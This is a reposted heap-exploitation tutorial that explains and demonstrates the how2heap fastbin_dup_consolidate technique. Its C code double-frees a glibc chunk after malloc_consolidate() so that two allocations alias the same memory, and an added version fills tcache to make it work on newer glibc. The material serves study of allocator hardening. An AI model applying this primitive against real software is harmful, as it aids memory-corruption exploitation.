4.fastbin_dup_consolidate

Source code

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

/* how2heap's fastbin_dup_consolidate demo. It targets glibc without tcache
   (before 2.26): on later versions malloc(0x40) is served from tcache and
   this exact sequence is caught by the tcache double-free check. */
int main() {
  void* p1 = malloc(0x40);   /* 0x50 chunk: fastbin-sized */
  void* p2 = malloc(0x40);   /* keeps p1 from being merged into the top chunk */
  fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
  fprintf(stderr, "Now free p1!\n");
  free(p1);                  /* p1 goes into the 0x50 fastbin */

  /* A large request (chunk size 0x410) makes _int_malloc() call
     malloc_consolidate(), which empties the fastbins; p1 ends up in the
     unsorted bin and is then sorted into the 0x50 small bin. */
  void* p3 = malloc(0x400);
  fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
  fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
  free(p1);                  /* double free: the fastbin is empty, so the fasttop check in free() passes */
  fprintf(stderr, "Trigger the double free vulnerability!\n");
  fprintf(stderr, "We can pass the check in free() since p1 is not fast top.\n");
  /* p1 is now in the fastbin and in the small bin: the first malloc takes
     it from the fastbin, the second from the small bin. */
  fprintf(stderr, "Now p1 is in small bin and fast bin. So we'll get it twice: %p %p\n", malloc(0x40), malloc(0x40));
  return 0;
}

Output

checksec (screenshot in the original post)

First two 0x40-byte chunks, p1 and p2, are requested; the resulting 0x50 chunks are within the fastbin size range.

Then p1 is freed and goes into the 0x50 fastbin.

Next a 0x400-byte chunk p3 is requested. Its chunk size (0x410) is in the large-bin range, so _int_malloc() calls malloc_consolidate() before serving it.

malloc_consolidate() moves p1 out of the fastbin into the unsorted bin; while p3 is being served, the unsorted bin is processed and p1 is sorted into the 0x50 small bin.

At this point p1 is no longer at the head of the fastbin (the fastbin is empty).

The only double-free check in free()'s fastbin path is "double free or corruption (fasttop)", which compares the chunk with the current fastbin head, so p1 can be freed a second time.

After that free

both the fastbin and the small bin contain p1.

Two further malloc(0x40) calls then both return memory pointing to p1.

Debugging gives the picture above: the first request takes p1 from the fastbin (checked first), the second takes p1 from the small bin.

That is the double free: two live allocations alias the same chunk, which is the overlap an attacker builds on.
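The listing above only works on glibc without tcache (before 2.26): on newer versions malloc(0x40) is served from tcache, and freeing a tcache chunk twice is caught by the tcache double-free check. The following is an added example, not code from the original post or from how2heap, that ports the same sequence so it runs on both kinds of glibc: it first fills the 0x50 tcache bin with seven frees (assuming the default tcache_count of 7, and that tunables have not changed it), interleaves those filler chunks with in-use guards so that a tcache-less glibc does not coalesce them during malloc_consolidate(), and then counts how many of the final nine malloc(0x40) calls return the doubly freed p1. The function name fastbin_dup_consolidate_demo and the array names fill and guard are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>

/* Size class under attack: a 0x40-byte request gives a 0x50-byte chunk,
   which is fastbin-sized on 64-bit glibc. */
#define REQ 0x40
/* glibc's tcache holds at most 7 chunks per size class by default
   (mp_.tcache_count); assumption: the default has not been tuned. */
#define TCACHE_COUNT 7

/* Runs the fastbin_dup_consolidate sequence and returns how many of the
   final TCACHE_COUNT + 2 malloc(REQ) calls handed back the doubly freed
   chunk p1. A result of 2 means the double free went through and two
   live allocations alias the same memory. */
int fastbin_dup_consolidate_demo(void) {
    void *fill[TCACHE_COUNT];
    void *guard[TCACHE_COUNT];

    /* Interleave fillers with in-use guards so that, on a glibc without
       tcache (< 2.26), the fillers sit in the fastbin but never coalesce
       with each other inside malloc_consolidate(). */
    for (int i = 0; i < TCACHE_COUNT; i++) {
        fill[i] = malloc(REQ);
        guard[i] = malloc(REQ);
    }
    void *p1 = malloc(REQ);
    void *p2 = malloc(REQ);      /* in-use neighbour: p1 cannot merge into top */
    (void)guard;
    (void)p2;

    /* With tcache (glibc >= 2.26) these seven frees fill the 0x50 tcache
       bin, so the following free(p1) falls through to the fastbin exactly
       as in the original demo. Without tcache they simply join the fastbin. */
    for (int i = 0; i < TCACHE_COUNT; i++)
        free(fill[i]);
    free(p1);                    /* p1 -> fastbin */

    /* A large request (chunk size 0x410 >= MIN_LARGE_SIZE) makes
       _int_malloc() call malloc_consolidate(): p1 is moved to the unsorted
       bin and then sorted into the 0x50 small bin, while p3 itself is
       carved from the top chunk. */
    void *p3 = malloc(0x400);
    (void)p3;

    /* Second free of p1. The fastbin "double free or corruption (fasttop)"
       check only compares p1 with the fastbin head, and the fastbin is
       empty after consolidation, so it passes. p1 is now in the fastbin
       AND in the small bin. */
    free(p1);

    /* Drain: tcache entries (if any) come back first, then the fastbin
       copy of p1, then the small bin copy of p1. */
    int hits = 0;
    for (int i = 0; i < TCACHE_COUNT + 2; i++) {
        if (malloc(REQ) == p1)
            hits++;
    }
    return hits;
}

int main(void) {
    int hits = fastbin_dup_consolidate_demo();
    fprintf(stderr, "p1 returned %d times from %d allocations\n",
            hits, TCACHE_COUNT + 2);
    return hits == 2 ? 0 : 1;
}
```

The count is the observable that matters: a hardened allocator (or a glibc whose fastbin free path compared against more than the bin head) would either abort at the second free(p1) or return p1 at most once. On glibc the second free is accepted because p1 is simultaneously reachable from two bins that free() never cross-checks.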

Reposted from www.cnblogs.com/pfcode/p/10989832.html